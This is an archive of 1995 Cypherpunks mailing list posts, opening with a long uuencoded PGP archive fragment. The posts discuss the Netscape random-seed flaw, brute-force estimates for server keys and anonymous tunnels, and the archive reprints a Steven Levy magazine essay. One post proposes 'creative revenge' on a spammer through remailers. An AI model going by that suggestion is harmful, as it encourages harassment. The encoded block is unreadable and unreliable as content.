MW]')C`-(A_05G1],J2;#@#;K,>O38CSBO'9MMA;0KNE2225G"5KVG/WFXY&MHN<"RA?/(N%YKCX8XB?QY//% MW4IB["`UXLM[$R2&,+Q[2H*<*>9UR3!U7]LJ8W#9N5OB%?TWX#\KBUHL;T%\ MS*(8?=!1(C"^K.""XU[L*!515&%]P`XQU\T<=`"(]<$5#=(0"`?*\"*AW<7M M3R^8JT!>*.A$V-R)39J%>![!O`!MC`UBX8&WX%(.IRZ'G6$%0K[J MH-9$]UQ-EL^G^G`%L21"^\522R^2^YDL9Z'#:0I^&DA^9ZL0P_IA9U$3&1(Z MR,[9#O0#T#E`V/XDN!.LFLH5I2+J[=]2#F8AJF!\,IXUW*12$P$X)QV"F:K? M*`GZOU$IROU&_7#^:CR2N]?/2(VU$@=)+(!&9:(?(&$6:P;(6=90@<*&4$"F M];;+%X5H)ID=&A+1WHKQB,]N.0K0Q[X'H@,B;H,9\4]N]=MS9L9XE$!V9E2D MP>N-*8Z*A.10 at A.'0)1)*IBYH]G0MOV$'\=*KRIAII1U$DN$4Y45C8>)XBCT,'J(@FQJ%-;<,1RSVP`E*:VB$7$A;5^I!*.'JKX?11 MR;4Y:F]$=ZZEC'A,=_)"W$%7 at 6V$,YV(@:6 at R^=OC$8&%1TLLN^=*?:#(EVJ M6LJ&H at 2/KC8>=7>;&,O)#9%B at S?%!KI'?_`MS/=]83/4TRK)WJRKIH+$:5,3 MHD6TFQ'!L(%8Q^1+D+"B#]KI_=X@*C956P7FV`3*^3Z%@W-"KMBI6 at +2RU[P MBZ.N71U<]=*KZV\S!?%>+98K!9E=PH7J0GUU=#PM^'JY MNKGY?,?;PG(JJ*(K][I^SAT98KJ#D:V/@XHJ*UU?D\1K2Z6'.8OL at +X"R[K/ MALGH?G?T'#/:PF;?TNC^5[VJ;)OEX23.C^2KB:0@`UJ@*K9$GR(JUH.I[>;8 MD9`%U94L$Q[IY6@E7SWR.:?:2?0K>GA2>M5!S4>?V_W MO$4P/K1*G)/X0D09>.=C at 659_771'2(94$N[J.QTRL]]9#46N!"M'YP MM1>Z6B3:H3RZ:U1$^D7N]1'Q,,FLJ MS-6%0D.BYBP&R)5K9ZFA`IG2G:/S[CLYGZRE?Q)=!6J2*OAP#%&,.YV/1Q(W M@`/,>2? MARM84Z)73SJ8.VC-+G8+.GW1W/LI76XW;'[LFT%D:L9U:"1ZAIG`)S8&OD0T M/G:SC.C$0U9'3O`+0W3&H-'K,43`UJ<.98MR-AY]^+922W5Y5V82O>DYMS at 3V]M^6>6,.>&CX)KYCI$?O4*:*T M%280C.#>)6JS-BY$!]+YCZAF=$X*M>QV]JGG#D*AV^VQ`]BCSW M9/1A-5=?"Z-1L:T-HJ($0EMG38F4C&3/'KU+9P2TX`#P8+)_^G7+TPC`V+CZ M,L7SZ%V,U+'M!K,#TO"5U=SF2YK1?#ZM$R at 6; M*HY.B!\B/D&/8'#7'XR<'EDUH_=AQU,3H0OIG+BM+9!4Y4V! M-I!X.C at J.HK[0VXC)/.&F@]M##Z8(`=>]+X`^S[)X:`=!_HDD_2 MNMPK9B)\XD/ZL%\@P>0$+>D44GK)Y[`X],Z=#/Z,CZ!JS!WS-BKA at --!.T82W-X$B'PZ8X<%E>R&%`9MV798 M`PF2%`TY!$.`1Q%ZKXZW%'V'2[=5TTZ\I*I6_QY\WV^"YUOVE2:W3=F.[73Y MKDLK1$*/RU2J at P7@_<\F<#R;90.0&!G$GA88N/N3Z4F"YRSEMBD>?A\L\&=G$E7/1$2Y5W%)3%=:3.^`;5?O^4 M!A19(+=AY:<[1U`X at B.&>9*O;C&_%,729C.&N2E[@KL]1#`%0S=9&-1JH`T" MA9]R2A(BO]>Q@)_5SON80/12ATDL,K:9Z]H\&OB9MOEFJKDPL4G.XU'*CKQ>UJN5K>7-/% MYV;.[*!GM&9U=7NG;CX.%/K+M[N5^G#5[D/\\+&.UZ99'913%\/[,R\Q at I7M M8N("6?;:VTA9H5G$W^*8R at X;G04(Q<9ZY0N at J1?=!C64IU\,ZEKT`/;$,06]@)HL3O")ZR8G*[0"O9&_*D<&N]"Z-Y''`1#\ MF_5'%@;%-_4W4SO!*6PBJ+WAQNV%(U+'QSW?*?>>;+KF#]>O9*Y1"A;B-AD6 MQ#.:*MBB*W5+8PHERP8>J>()$6)1+U>;QEC\#X9[AW$4==JBM_J16]NCN(L;;W!<$M[A% M&T]O:]ZJG37CI*V=`5']>0\9[^T:KX_[U[3SEN>?ZG;(\C5D=!H-/)G#R7K:TM!2%%BWS=N2)/LYV).&B1YTKOVJ)G?XUQ M7/H,T'\VP-HRER*347GJ*&9=RZI?QFV/A%V,1ZGCTF\%G?\P'X\F7XZ,F9>+ MJRBQ)S.OK[N9UYEZ6F-<&(Z#QVHX=]SF=3Q2 MS/0C$DU^/14]VV!H\9>T.Q6?4O5`^U:WD=GZ+JWK]ILLTI]L1*_.=VIY<[GZ M#&A5%.K-F[/%[G%2U@[;MFH!(("->AVR2K@@@\.#OD.D&L6 at JO7E;!,Q5>!< M5#BTT;9@`--U6SIG@!,SDD?$+"@@T#U0Y&+7H=6Z<-G]HP%V&9R0\IX0DC(2 M&9=$Y)$DAG9F5BAP8CY]YM<(<6 at OE@VXJL:7:F9OX8L?62X(.K[\5% M2VFU-ZOM22[RV0^SM-N;63M+])8WOKGZTJZ?SM0Z!J94".*,3A2B':,[C6-U MM3KEP:)IG.=?&U'@"2:0F#C)F](44IR8C!^UELF9P[:*.WYPW]O[W)V^ M2MZH/#+(*TR^-1'@X;62RM>QG1#B233CM$0""@@H)YL&TLS0K$/2Q.=W3&4SU2!7X*N3?PX(_Q M=LS,VF(?[A]$F_>B!D\T4?BG at IPCK\!@:JB-A!_BH:L59E;4YNBKRCF$F<_PN(HYNVE)B<&VX5!S;P>C;R84,9?!,U2[X,I1EAL^&<;O'.7_\=YL_CC$\PA M8`;?!`FCMD+5,+8RV-/Q5_A%%L017>Y,G at J^GJ!K@)A+Q]7M/-!I7#J-:S\M M3L*19#-9+JYFZN[RCI at 6,L3,^)HSM-H5!8:FTP\Z8KT6"_FG1HCIII!R$C*Q M"JUYYI(TR.==;8HV0LP1#-Y="IHC.1S]';4) M6!0!V23=DO;JMTC2X"'4)RY_-55[X>"<*IL,U7/B_[N3.,?YWXVIB0/J:ZV) M&[U_)GL\^:^\^5WNW\PWZ]_E#_.FLB=Y8_VZJ;?S'!/ZO$9?,>-4U_?A/4RS>8627;YM-NK&.KI_)#&;+-D( MLF at M`E'9")]V_22R;MJ=C1^>>4$1G7>F5`5]>\F;9LX]YW?N/?=WS[WG M3F5\2/8'XB>"*'286ZW./?#?GTI7QK*E^E(@@0!B+8)/_M/HHTJ_ M>N>>$JNCI=;<7&I at 6=8.*9!%,.-U7P(*4MHKO[FY8*6?7.Z'?O at _?_1]=`[H M>_*RX/:"OD^S$0$MBP"7!_J/M1MAY`[Q[$P>?4B3/X9]N`D;!<#UVDAC)D]* M^8,P??]:+DD]D8L^I!M)-ZDC#^.K_,Y1MU7#!CH^1W&GFBBJ6Y%`>-+SSRY@ M8)PBC%,\N\V-VS0$AEUS$[B^IG72CZAGV14]1[H3K-H`$,CFPK8L!G"MUY$=3/SAB+H_6=O?,?U:)S,G.S5O@,1,XSEF6"0G,KF M*>E at OU3>'T8V)ES%ZOAGQ%P]$E;H*:R$U?%A8JX\A<3KR#E=2D\X9+MCN(&. M?TFVN?1*WNW1>(8:NCG&1KEV_,SUV+*2L'XI09F8,VTR?^L3G[[XWTG:1[\O M:50R:?M6)JV-F-NU,FDMQ%S)RZ0=(N8*7B?M=Z;JR/-A#QVW$(GVY_OL5P#& MJDS0. at 3$XN,!=^MH#0Q5P>,+[E,3+X at K^R\-G**1$!G4[@)P51^HCREL<(W] M\-98E[VUN^HB/!2*@E51G#,]6!4#$'(KZ8, at I&$G21765$!=]'Y&]<"#Q66! MW2X3`0&U_5P;7+HBRY<&7%*Q,BJP:2G at QA4!-4J4^NE9ZBDWD2;+2$J@$IUR M["U"HQ_!4#6NY38,)@N/LXN,+^6]& M&F2F"F+[AE1 at +UH#JNW&/_&D*ET?JH6]KFA<]2!Q(*;.?'F/5^WW'_9WG?!; M_M)1N`QU>#T=-3S?Q2\'6WF?X&WQ\KX/3A;&;Q"#?YPJZ,G30A^]'I1-C<>( M8VS\.R)U-6E`V=BUJ.42L'3K)/[Q+.)@Q`T0J6-6=Y_'P[:;0>K"+;$(1#=$ M&I+6B+ at 9Q/<@8D]:EW5T(_.WKZK%33#/%>&+SF+HP9,];RB%";H,OR.X3_R6 M::X,3"3P^4E%!;PVJ60`KTXJ:X%7*4JD#,X[8`R+HN_&O*$,2TP at JL5R2",Q M^$Z,:D]!!Z&Z6JQ$'C`=%RL at 4@Y*P51`\`;9HTW:\QB.4 at IR)EF0.(P1OL/J9#^#(3T(Q"=36,TIX'17(7!=Z<*0MJS$-)^#Z<2(^G3LR'-YQ#2C,*. MF>BO%(,N!EW)/1BWJ97+7/,AG=J(K&#R*E_:DL3"T[Y;']\;;F:2YV4XLM1R M8W_/^F;;(M=M4@?()['+ at 7^-_I+1^D5 at 7;>1$$S=1EDH[#:"4!SXS:VT:@7. M4&"J5GH4'*<0#-Q]&JL-&Y4R<$O?)C6L)NGKVB$`&]>;9MS.YQHK3F1OW3X( M]G`T.DM1D]2DBYJ49HVLL,K(".E&M4"YG\;"QAZU.]$E[W5:FYS at 8/9:45@= M:,C86A7AJ&^I(>JP15%78[8ZB=U,G16%L\;2W.1P$@VH*:+9[&BV'&@@&AFG M!45-HU6Q[$R-!<6*K_"K(\\>QW]$+.\YP7;XCAUF.[S'?>U>MH/W'??RZDQ+ MU]&3O*_SSP*[I;V8+:VHV,F^?Y+='?#RG5X_:^<]_DYU)M9/LHY8G]\G^#Q' M?'_U^3O9E_&70FUE_5T">Z3+T^'MP!'_!E!+`P04``(`"```"#0;^)ID=V\" M``!=!```!@```%)%041-15532V_4,!"^1_(?X#3'5MJN6AX5UXH*40%"L$B( MX\2>C:TF=O#87>7?,^-D2SGM9CS^YGN,?]S]NG\X?-X??A\@,"#&:IN9!;=;G45BBIX#@N\!1RJ3CNP%.T9+HH&D2S0LHD(N-P%"G%2^]_9NMEL6:@`ILWIELMT/+98VY, M9_&V#6<%HS!$[1$+=OI+$?M1N'LA6AD':C'%!;X_?+AZ?RW1B`F33%2H4+AY MUZ-:W:-]K#-P.I:3Z#>=;$'!K?!)4EL'%*7)2OLJ=C77>DEC"*9&IN3!C#++&7 MIO*9 at UK^(`G8-$VD at 1(Z9:X]+MDJQ;*N at 95^01X7Y2WT`IN.>"8;6MPE5]I! M.,*2:B/U0 at .<0O';:Y%/;L]`)F3=2HSP]7"E1^_VUVUEU^;GP,3C]E3^';5/ M?6>F\\@P)5T[!;JY?OT6S@^']<;M&UAWMGW=W((7@;R#GBP*2].)G<*3D!=U MR9$DG98FWZ:V?EMN!">?Q/(VN_+JD7JP2ES#W.1N"\TOEV[$1>^HD1L_T_6I M1H=9$I(<7OT%4$L!`A0`%``"``@`0`D]&S7N4\HK`0``U0$```L````````` M`0`@`````````$A)4U1/4EDN5%A44$L!`A0`%``"``@```@T&T%+/^!$&``` M6SP```L``````````0`@````5`$``%)!5T1)4TLN1$]#4$L!`A0`%``"``@` M0`D]&TX!B-G3!0``TPD```L````````````@````P1D``%)!5T1)4TLN4UE3 M4$L!`A0`%``"``@```@T&_B:9'=O`@``700```8``````````0`@````O1\` =`%)%041-15!+!08`````!``$`-\```!0(@`````` ` end sum -r/size 45061/12471 section (from "begin" to "end") sum -r/size 19623/9029 entire input file -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGKA894nNf3ah8DHAQHqfwP/ao6/+WwjDqv/DVfFHSupinSVq13tJurf GwTGRHuztQQcqGsCmEJyd7VDJG5L/Hdcqqwq2VL0KYbkSEo4HhNuRuZlQfVbTCQ9 0U3ShLUf3HaFf3n+ZoyU+QRt/GMuF4DTCnUwPW/FNSvwI2JdjoRDliCG4HuRLr/X ANKfSG9XxIc= =U7/K -----END PGP SIGNATURE----- --- edgar at HighNRG.sbay.org Keep Freestyle Alive! From rooster at ix.netcom.com Sat Sep 23 02:53:19 1995 From: rooster at ix.netcom.com (BRIAN PROBST ) Date: Sat, 23 Sep 95 02:53:19 PDT Subject: No Subject Message-ID: <199509230953.CAA21280@ix7.ix.netcom.com> ROSTER at IX.NETCOM.COM THANK YOU!! From rsalz at osf.org Sat Sep 23 03:00:16 1995 From: rsalz at osf.org (Rich Salz) Date: Sat, 23 Sep 95 03:00:16 PDT Subject: Fwd: Re: Project: a standard cell random number generator Message-ID: <9509230959.AA23786@sulphur.osf.org> >Yes Fortezza cards can be instructed to produce a random number through one >of its library calls (someday they'll have a real API). One of the I don't understand the parenthetical comment. Are you saying the API that the NSA defined isn't supported by everyone, isn't complete, or is "bad"? /r$ From habs at warwick.com Sat Sep 23 04:47:45 1995 From: habs at warwick.com (Harry S. Hawk) Date: Sat, 23 Sep 95 04:47:45 PDT Subject: The Next Hack In-Reply-To: <4407p5$on4@tera.mcom.com> Message-ID: <199509231147.HAA21618@cmyk.warwick.com> > In article <199509211832.LAA24086 at infinity.c2.org>, sameer at c2.org > (sameer) writes: > > Now that we've seen that Netscape is doing a good job towards > > trying to fix the hole that Ian and David have uncovered, it's time to > > start looking at new things. > > Proposal for action: Jeff writes: > What else do you hope to gain by breaking a server key? I think > the point has been made. Is there anything else that you would > reasonably expect that we would do in response to a server key > being broken that we have not already done? > > --Jeff Clearly the point that Sameer is making includes the Meta crypto creed, which is a that all security systems and they components should be discussed and tested in public. That it is not enough to test the client and that encryption contained in server products must also be dragged into the day light. Harry Hawk habs at panix.com Freelancer for NetGuide Mag. All comments are my own. From carolann at censored.org Sat Sep 23 05:17:20 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Sat, 23 Sep 95 05:17:20 PDT Subject: HEY!!! WAS: The Next Hack Message-ID: <199509231217.FAA27504@usr1.primenet.com> -----BEGIN PGP SIGNED MESSAGE----- Hey wait a minute!!! You HAD stated a patch would be available by Friday. Now we are at early next week. I watched the stock rise in the face of bad facts. Almost 25% of your stock changed hands yesterday. For the moment, it seems to me, anyway, you're getting a lot of work done here for dirt cheap. I don't know cypher codes very well, but I know Wall St. codes really well. And THEY ARE BEING VIOLATED! I am glad there is no anonymity on Wall St. We are starting to get into the realm of SEC action. And I could really care much about what happens out on the list. This is not a problem that lends itself to 'quick fixes'. For the only "quick fix you can give is still insecure crypto". That is the point of this. You can't really fix it. Most of us know it. The lies mount up on the stock price. I normally couldn't care less, I'm a Coca-Cola trader. My stock is at an all time high as I write this. It's up over 1200% in 10 years. No one can match it. (even MSFT) This is much worse than NEW COKE! For you are now better off letting them break key after key, server after server, until the laws change. I'd go back and talk to your management fast. For now you've become a pawn in a political game. And millions of dollars change hands daily as a result. Soon they will halt your stock trading if this keeps up. Something, in a way far worse than ever having Netscape cracked! Think about it. Love Always, Carol Anne ps I shipped all the postings to Washington already. > What exactly is the point of this? We have: > > 1) acknowledged that the RNG used in the server private-key > generation has the same problem > > 2) said that we will provide a patch early next week > > 3) said that we will provide new certificates for all customers > > 4) promised to make source code for our new seed generation code > publicly available > What else do you hope to gain by breaking a server key? I think >Jeff Weinstein - Electronic Munitions Specialist >Netscape Communication Corporation >jsw at netscape.com - http://home.netscape.com/people/jsw >Any opinions expressed above are mine. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGP6MIrpjEWs1wBlAQFh3QP8D+m5NyD4WNZEyOSzollcUDqEQusjxr5s 0t9455KBAGnvt/5UAyaQ0JdDqZ3wRePsoC9VVxHiiITjhZGbwalcgrDVmajAXVbG T+Hm4PEpM7tWt+R6pMvjhGcP2ldtzZf+OErE/yCSPTooxuOX5H6bBpb5e88n0eqo JpbxSBXgCX4= =C7J9 -----END PGP SIGNATURE----- -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From nobody at REPLAY.COM Sat Sep 23 05:40:19 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 23 Sep 95 05:40:19 PDT Subject: 500m.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo. Message-ID: <199509231240.OAA08555@utopia.hacktic.nl> NYT Magazine, Sept 24, 1995 How the Propeller Heads Stole the Electronic Future The silver-haired media monopolists follow their 500- channel dream. They haven't reckoned with the 500 million channels of Netscape and the Internet. By Steven Levy. If you want an arbitrary date for the burial of the 500-channel dream, Aug. 9, 1995, will do just fine. On that morning, the public had its first crack at buying stock in the year-old Netscape Commumcations Corporation, which makes software that helps people navigate the Internet and set up "sites" that Net surfers can visit. What happened next is already the stuff of high-tech legend. The offering price of $28 per share shot up within minutes to a vertiginous $75 until finally settling at $58, a price that valued the as-yet-profitless company at well over $2 billion. A month later, it was trading at about $53. The initial news reports focused on the instant millionaires at Netscape, including a 24-year-old computer programmer, Marc Andreessen, who emerged from the stock offering with that all-important first $58 million. But the real significance of the event was not that another bunch of propeller heads had joined the ranks of the super-rich. Aug. 9 marked the moment when Wall Street finally realized what had been becoming increasingly apparent to computer users: a set of highly technical but reliably standardized communications protocols known as the Internet had established itself as the real key to the electronic future. That future would be made not by silver-haired telephone- and cable-company executives in Denver, New York and Washington, building an empire around a golden goose called pay-per-view television, but by companies like Netscape and their customers. In short, the end of the 500-channel dream. This was a myth constructed by the masters of the media, people like John Malone of Tele-Communications Inc. (T.C.I.), Ray Smith of Bell Atlantic and Sumner Redstone of Viacom. They believed that the television set would extend its domain from the center of the entertainment universe to the worlds of commerce and information. Despite their promises that the new era of digital media would be marked by increased competition, they assumed that their companies would keep their hands on the valves of a limited information pipeline. But for consumers, the dream offered only two differences, really, between what the public has now and what will be available in the future. *The same programming but more of it*. Instead of getting 50 or 60 alternatives when you plopped down in front of the tube, you'd get a lot more. Five hundred was the number that stuck in people's minds. *So-called interactive programming*. The interactivity comes in makng choices: pressing buttons to choose programs and, above all, to buy things. The living-room television would be a cash register of sorts, enabling Dad, Mom, Junior, Sis and probably even the faithful dog Astro to buy more programming -- and buy more everything, from pizzas to Dustbusters. The operators of those systems, like T.C.I. and Time Warner, would act as gatekeepers, deciding which entertainment channels, pay-per-view events, banks, retailers, publications and data bases would reach consumers. There were tremendous opportunities to make money, not only from monthly fees and pay-per-view charges but also from percentages of every transaction. And then there was the wealth of information about consumer buying habits generated by the aggregation of buying choices made by pressing those buttons. This, too, would be sold and bartered. For the past few months the silver-haired guys have been arranging expensive technology tests in places like Orlando, Fla. They have been wooing Congress for favorable regulations. They have been frantically merging and making alliances. But meanwhile, a different vision of the media future has begun to form -- totally under their radar. It moved from the academic and scientific communities, then to the business world, then to politics. As it grew and grew, it suddenly became clear that this new vision had the potential to pull the plug on the 500-channel dream. This is the Internet and its most interesting subset, the World Wide Web. It is based on unlimited channels of communication, community building, electronic commerce and a full-blown version of interactivity that blurs the line between provider and consumer. You don't need an Arthur Andersen report or even a cyberpunk science fiction novel to envision how this new model of the future will work. Millions are already participating in it. Its nascent form -- albeit with often sluggish performance and frequent system crashes -- has spread like digital wildfire. In short, the information superhighway, font of a thousand bad metaphors, is already here. But it's not about sitting on a couch and pressing a button to order "Dumb and Dumber." It's about Web surfing, open systems and freedom. Why did the stock market go bonkers for Netscape, a year-old company that not only operated deep in the red but also warned in its prospectus that it did not intend to make any profits "in the foreseeable future?" Only one reason: the Internet If the 500 channel dream on the TV screen is the old future, the new one is the Internet on the computer screen. Think of it as a combination book, radio, magazine, mailbox, conversation parlor, bulletin board, billboard and, one day, television set. Install what is known as a browser program -- the most popular is Netscape's Navigator -- and you're cruising the World Wide Web. Your screen is a selection of signed baseballs up for auction, a tour of the Louvre, a zine (a self-published magazine) on the life of a teen-age girl in Canada, a multimedia repository of General Electric's public relations documents, the complete text of the Congressional Record. Millions of possibilities await you, and getting to them is easy. Anything can be wired to anything else on this World Wide Web (thus the name) by moving the cursor to a highlighted word or image with an embedded link to another location. Web travelers do not just travel by links, of course -- they can go directly to any Web site. The interesting thing about the sites is their equality. Like phone numbers, or addresses on letters, these addresses have no favored positions; in terms of gaining access to homes, ABC, Disney and Sears have no inherent advantage over Joe's Video or the corner pizza parlor. (For help in knowing what's available, people are already adopting the first of a new breed of electronic guide services, like the popular Yahoo Web site, a sort of Baedeker's of the Net.) At first, Web traveling seems like a fascinating but perhaps frivolous diversion. But then you consider the next step -- commerce. Secure creditcard transactions are already possible, the ability to charge for time spent on a link is currently being implemented and companies like Visa, Mastercard and newer entities with names like Cybercash and Digicash (and, yes, Microsoft) are concocting Net-based technologies that work just like cash. And then you begin to realize why some farsighted people in the media industries are terrified of the World Wide Web. Every home is potentially a video conferencing center, every independent film maker is potentially a widespread broadcaster, every business is potentially a global marketer. A single twisted idea and a rudimentary sense of layout can transform a voiceless outcast into a cult publisher. Now that's interactivity. The 500-cable-channel tests are just the beginning of a long process. The Net, meanwhile, has millions of people on it, now. It will take a decade or so to upgrade the Net to carry high-quality video services, but most everything else is feasible now and better suited to the desktop than to the TV room. You can't easily read a newsletter or a bank balance on a television set that's 20 feet away. So by the time the cable and telephone companies get their systems in order, millions of Americans will be riding the I-way from their dens and offices, not their living rooms. Sure, eventually the electronics of computers and televisions will be indistinguishable, but by then the road to information nilvana will have been laid -- and the ethos will be that of the Internet. In that ethos, the people who provide you the pipes to move information have no say in what content moves through those pipes. They collect no information on their consumers' buying habits, and they certainly do not get a piece of the transactions that occur over their wires. The guys in the middle -- those with the 500-channel dream -- will thus be cut out of the best part of the action. The masters of the media have taken notice, and lately they've been hedging their bets. Still, they have yet to grasp that the Internet can never be merely another profit center in their dreams of empire. Their power is based on monopoly, on controlling distribution. But the Net is built to smash monopolies. Instead of a gatekeeper, users get an open invitation to the electronic world and can choose whatever they want. "If there is a market for 500 channels," says James Barksdale, Netscape's president, "imagine the market for 5 million, 50 million, 500 million!" Now, this new vision doesn't portend poverty for the media masters. There's still a place for movie studios, television producers and music publishers -- the Disneys of the world -- in this new, content-driven universe. The phone companies will provide Internet access to the masses. And the couch-potato style of television will probably always be with us. But it won't be business as usual for the media masters. It's entirely possible that beginning novelists, musicians and even film makers will choose to distribute through the Web. And it's almost inevitable that one day soon, a John Grisham, an R.E.M. or a Roseanne will grasp the advantages of ditching the media company and selling directly to the consumer. A year ago, people were buzzing about the proposed (and eventually aborted) marriage of Bell Atlantic and T.C.I. Now people are talking about Disney and Cap Cities, CBS and Westinghouse, and Ted Turner and some other television network. But if the World Wide Web shatters the current paradigm of distribution, the channel capabilities of cable systems and even networks will be severely devalued. Anyone will be able to set up a new channel or storefront on the virtual highway, for free, asking permission of no one and accepting income directly over the wire. This is why John Perry Barlow, co-founder of the Electronic Frontier Foundation, calls the current vave of media realliances "the rearrangement of deck chairs on the Titanic." The iceberg, of course, is the Internet. ---------- Steven Levy is a columnist for Newsweek. His last article for the New York Times Magazine was "The Unabomber and David Gelernter." From remailer at bi-node.zerberus.de Sat Sep 23 06:15:30 1995 From: remailer at bi-node.zerberus.de (Ford Prefect) Date: Sat, 23 Sep 95 06:15:30 PDT Subject: No Subject Message-ID: Again, we're Spammed by a moron. Time to fire up the old remailers! [At least they do this on weekends, when we have time for creative revenge!] Hehehehehe... From trei at process.com Sat Sep 23 06:42:24 1995 From: trei at process.com (Peter Trei) Date: Sat, 23 Sep 95 06:42:24 PDT Subject: (Fwd) Netscape Commerce Server and Certificates Message-ID: <9509231342.AA03015@toad.com> >From www-security... ------- Forwarded Message Follows ------- Date: Sat, 23 Sep 95 01:07:38 From: Subject: Netscape Commerce Server and Certificates To: "john hemming ceo marketnet" , www-security at ns2.rutgers.edu Cc: The Commerce server is significantly less vulnerable because: 1. Key pairs are generated only once 2. Access to the actual server is limited for hackers to try to guess with some accurace when the key pair was generated. 3. The time it takes to generate key pairs is about 5 seconds on a reasonably powerful UNIX machine. 4. Since the random number seed address space is 30 bits, even if one knew approximately when the server key-pair was generated it only reduces this dows to say 20 bits. Therefore the operation can take anywhere from (2**20 to 2**30) * 5 seconds = 5 million to 5 billion seconds. 5 million seconds = 57.8 days 5 billion seconds = 158 years 5. We plan to have the patch available by next week 6. You are right about server owners having to get new certificates. Netscape and VeriSign will offer new six month certificates to all current certificate owners at no charge. --Atri At 09:58 PM 9/22/95 PDT, John Hemming CEO MarketNet wrote: >>Netscape Commerce server certificates use RSA key pairs generated by the
>>user, i.e. with "Netscape's shoddy random number genrator" (sic). All the
>>server running in "secure" mode need new RSA keys and certificates as noted
>>in the following excerpt from the official Netscape response.
>
>>"In addition, the current version of the Netscape Commerce Server has a
>>similar vulnerability during it's initial key-pair generation. Therefore, a
>>patch will be made available from Netscape and should be applied by Commerce
>>Server customers to generate a new key pair and server certificate."
>If that is really what Netscape have issued then it needs correcting unless >for some reason RSA's private key is stored in the Commerce Server. I would >presume that a certificate request would be needed instead. > >There is really quite a high noise to signal ratio in dealing with the >non randomness of the unix Navigator (which is what I understand >the problem to be). > > > > ____________________________________ Atri Chatterjee Server Marketing Netscape Communications Corporation (415) 528-2834 (ph) (415) 528-4120 (fax) Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From jamesd at echeque.com Sat Sep 23 07:30:22 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 23 Sep 95 07:30:22 PDT Subject: Seeds which depend on machine states Message-ID: <199509231430.HAA23116@blob.best.net> At 08:19 AM 9/22/95 -0700, Patrick Horgan wrote: > That assumes that you have someway of measuring the timing to microsecond > precision. On most machines I've been on, if you get something time- > stamped, even if there is a microsecond portion of the timestamp it's > meaningless because it wasn't based on a timer with the required precision. On Windows there is a timer with the required precision -- not microsecond accuracy of course -- microsecond precision. For our purposes the less accuracy the better. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From perry at piermont.com Sat Sep 23 07:53:30 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 23 Sep 95 07:53:30 PDT Subject: Council of Europe proposes to outlaw strong encryption (fwd) In-Reply-To: <199509221509.LAA09991@panix.com> Message-ID: <199509231453.KAA05871@frankenstein.piermont.com> Duncan Frissell writes: > Question for Perry -- I'm assuming that it will soon be possible to > originate encrypted TCP/IP sessions with a distant "process" somewhere. Do > you see technical problems with a TCP/IP laundry being established > "somewhere" that strips trace info from one of my processes and prevents > back tracing beyond the mouth of this encrypted pipe? It can be done (in some sense its just an extension of the Socks protocol), but I'm not sure how easy it will be to prevent all traffic analysis on the thing. Also, if this gets done frequently, it sort of screws up our attempts to keep up the efficiency of traffic in the network. > Also Perry, what did you think of the article "How Anarchy Works" in the > latest Wired on the IETF? I haven't read it, although the IETF is certainly (whether it knows it or not) an organization run on anarchist lines. Perry From dmandl at panix.com Sat Sep 23 08:13:31 1995 From: dmandl at panix.com (David Mandl) Date: Sat, 23 Sep 95 08:13:31 PDT Subject: HEY!!! WAS: The Next Hack Message-ID: Looks like we've got a perfect candidate for the first Official Cypherpunks Press Release, folks. --D. At 7:16 AM 9/23/95, Censored Girls Anonymous wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >Hey wait a minute!!! > >You HAD stated a patch would be available by Friday. >Now we are at early next week. > >I watched the stock rise in the face of bad facts. >Almost 25% of your stock changed hands yesterday. > >For the moment, it seems to me, anyway, you're getting >a lot of work done here for dirt cheap. I don't know >cypher codes very well, but I know Wall St. codes really >well. And THEY ARE BEING VIOLATED! I am glad there is no >anonymity on Wall St. We are starting to get into the >realm of SEC action. And I could really care much about >what happens out on the list. > >This is not a problem that lends itself to 'quick fixes'. >For the only "quick fix you can give is still insecure crypto". > >That is the point of this. >You can't really fix it. >Most of us know it. >The lies mount up >on the stock price. > >I normally couldn't care less, I'm a Coca-Cola trader. >My stock is at an all time high as I write this. >It's up over 1200% in 10 years. No one can match it. (even MSFT) > >This is much worse than NEW COKE! > >For you are now better off letting them break key after key, >server after server, until the laws change. > >I'd go back and talk to your management fast. >For now you've become a pawn in a political game. >And millions of dollars change hands daily as a result. > >Soon they will halt your stock trading if this keeps up. > >Something, in a way far worse than ever having Netscape cracked! > >Think about it. > >Love Always, > >Carol Anne >ps I shipped all the postings to Washington already. > >> What exactly is the point of this? We have: >> >> 1) acknowledged that the RNG used in the server private-key >> generation has the same problem >> >> 2) said that we will provide a patch early next week >> >> 3) said that we will provide new certificates for all customers >> >> 4) promised to make source code for our new seed generation code >> publicly available > >> What else do you hope to gain by breaking a server key? I think >>Jeff Weinstein - Electronic Munitions Specialist >>Netscape Communication Corporation >>jsw at netscape.com - http://home.netscape.com/people/jsw >>Any opinions expressed above are mine. > > >-----BEGIN PGP SIGNATURE----- >Version: 2.6.2 > >iQCVAwUBMGP6MIrpjEWs1wBlAQFh3QP8D+m5NyD4WNZEyOSzollcUDqEQusjxr5s >0t9455KBAGnvt/5UAyaQ0JdDqZ3wRePsoC9VVxHiiITjhZGbwalcgrDVmajAXVbG >T+Hm4PEpM7tWt+R6pMvjhGcP2ldtzZf+OErE/yCSPTooxuOX5H6bBpb5e88n0eqo >JpbxSBXgCX4= >=C7J9 >-----END PGP SIGNATURE----- >-- > >Member Internet Society - Certified BETSI Programmer - Webmistress >*********************************************************************** >Carol Anne Braddock (cab8) carolann at censored.org 